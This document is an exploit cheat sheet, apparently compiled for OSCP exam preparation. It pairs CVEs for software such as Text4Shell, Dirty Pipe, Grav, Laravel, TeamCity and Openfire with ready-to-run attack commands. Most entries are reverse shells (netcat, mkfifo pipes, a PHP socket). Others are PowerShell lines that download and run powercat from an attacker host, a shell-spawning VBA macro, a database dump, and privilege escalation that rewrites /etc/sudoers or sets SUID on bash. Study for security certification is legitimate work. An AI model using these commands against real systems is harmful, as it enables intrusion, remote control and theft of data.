This content is intended strictly for educational purposes and authorized penetration testing in controlled environments. Unauthorized access to systems, networks, or data is illegal and can lead to criminal prosecution.
Use these exploits only on systems you own or have explicit permission to test. The author is not responsible for any misuse, damage, or legal consequences resulting from the use of this material.
Stay ethical. Hack responsibly.
This is a curated collection of CVEs, proof-of-concept commands, and notes compiled during my preparation for the Offensive Security Certified Professional (OSCP) certification.
Each entry includes:
- A known CVE or technique
- Relevant usage or exploit commands
- A reference link
- Tags for searchability
- Notes based on lab testing (e.g. Hack The Box, TryHackMe, local VMs)
All exploits were tested in lab-only environments and are intended solely for learning, practicing, and enhancing practical pentesting skills.
wget http://:8080/search?query=%0A%0A%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20%20%20-e%20%2Fbin%2Fsh%27%29%7D
python3 text4shell.py -u 'http://:8080/search?query=' -m rce -c 'busybox nc -e /bin/sh'
notes: easy method
tags: text4shell
https://github.com/Al1ex/CVE-2022-0847
./exp /etc/passwd 1 ootz:
su rootz
notes: literally just it
tags: dirtypipe, dirty pipe
https://github.com/manuelz120/CVE-2022-23940/blob/main/exploit.py
python3 exploit.py -u admin -p admin --payload "php -r '$sock=fsockopen("",80);exec("/bin/bash -i <&3 >&3 2>&3");'"
notes: (change target IP in code first)
python3 CVE_Jorani.py
notes: quite unstable so might want to reverse shell again
https://www.exploit-db.com/exploits/52082
python3 SOPlanning-1.52.01-RCE-Exploit.py -t <url + path> -u admin -p admin
notes: if the URL is weird, refer to planning.php
tags: SOPlanning 1.52.01 RCE
https://www.exploit-db.com/exploits/50640
python3 50640.py -t -p 8000 -L -P 80
notes: (Create project first)
https://github.com/SudoIndividual/CVE-2023-34152/blob/main/CVE-2023-34152.py
python3 CVE-2023-34152.py 80
tags: ImageMagick 6.9.6-4
https://github.com/CsEnox/CVE-2021-21425
python3 exploit.py -t /grav-admin -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc >/tmp/f'
tags: grav, gravcms
https://www.exploit-db.com/exploits/50911
python3 50911.py -s
notes: curl -F myFile=@image.jpg
tags: exiftool, ExifTool 12.23
./exploit.sh
tags: searchor 2.4.2 2.4.0
https://github.com/iumiro/CVE-2023-1177-MLFlow
https://huntr.com/bounties/52a3855d-93ff-4460-ac24-9c7e4334198d
tags: mlflow <2.1.1
https://github.com/MoritzHuppert/CVE-2022-25018/blob/main/CVE-2022-25018.pdf
https://github.com/erlaplante/pluxml-rce
python3 pluxml.py url username password
tags: pluxml 5.8.7
https://www.exploit-db.com/exploits/48789
https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697
python3 exploit.py --rhost --rport 8000 --lhost --lport 80
tags: Barracuda drive 6.5, FuguHub 8.4
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-qm8h-3xvf-m7j3
sqlmap -u 'http://$ip/zm/index.php?view=request&request=event&action=removetag&tid=1' --dbms=MySQL -D zm -T Users --dump
tags: zoneminder
https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129/blob/main/exploit.py
python3 exploit.py
tags: Laravel 8.4.2
https://github.com/Clydeston/CVE-2023-6019/blob/main/CVE-2023-6019.py
tags: Ray OS
https://raw.githubusercontent.com/nuridincersaygili/CVE-2024-2928/refs/heads/main/CVE-2024-2928.py
python3 -t -p
tags: mlflow 2.9.2, mlflow cli
curl http://URL:8080/search?query=${script:javascript:java.lang.Runtime.getRuntime().exec('wget /nc.exe -O /tmp/nc.exe')}
https://www.exploit-db.com/exploits/50983
python3 50983.py
tags: rpc.py
https://www.exploit-db.com/exploits/51532
python3 51532.py -u url -c "busybox nc -e sh"
tags: pyloader 0.5.0 rce
python3 exploit.py ip port url
tags: maltrail 0.53, maltrail 0.52
https://github.com/miko550/CVE-2023-32315
python3 CVE-2023-32315.py
notes: try /plugin-admin.jsp or /plugins/openfire-management-tool-plugin/cmd.jsp
tags: openfire 4.7.3
https://github.com/W01fh4cker/CVE-2024-27198-RCE
python3 CVE-2024-27198-RCE.py -t -u admin -p admin -f
tags: teamcity 2023.05.4
http://example.com/?name=#{'%20`busybox nc -e sh`'}
https://www.exploit-db.com/exploits/51293
python3 51293.py -c ip port -w : -p
tags: PDFKIT
go run exploit.go -t
https://www.exploit-db.com/exploits/49216
python3 49216.py
tags: smartermail
notes: Don’t change the port of the victim unless it is on another port, otherwise remember to make changes to the script
https://github.com/CountablyInfinite/HP-Power-Manager-Buffer-Overflow-Python3/tree/master
python3 hp_pm_exploit_p3.py 80 80
tags: HP Power Manager
https://www.exploit-db.com/exploits/45296
https://www.exploit-db.com/exploits/50130
tags: DVR
https://github.com/0bfxgh0st/MMG-LO/tree/main
python3
cmd /c powershell -exec bypass -c ""IEX (New-Object System.Net.WebClient).DownloadString('http://LHOST:8080/powercat.ps1'); powercat -c -p -e powershell"
https://www.youtube.com/watch?v=-yQsy1SzcpE
Sub Main
Shell("cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://LHOST:8080/powercat.ps1');powercat -c -p -e powershell")
End Sub
echo 'exec "/bin/bash"' > app.rb
https://gist.github.com/gr33n7007h/c8cba38c5a4a59905f62233b36882325
http://192.168.212.23//sites/default/assets/img/attachments/[file.php]
notes: admin panel > global settings > change forum logo
tags: CODOFORUM
!bash
notes: Only works if less is launched as root
echo "echo 'user ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > exploit.sh
(user = username)
notes: Adds user to /etc/sudoers
echo "chmod 4777 /bin/bash" > exploit.sh
(priv esc with /bin/bash -p)
notes: priv esc by setting SUID on /bin/bash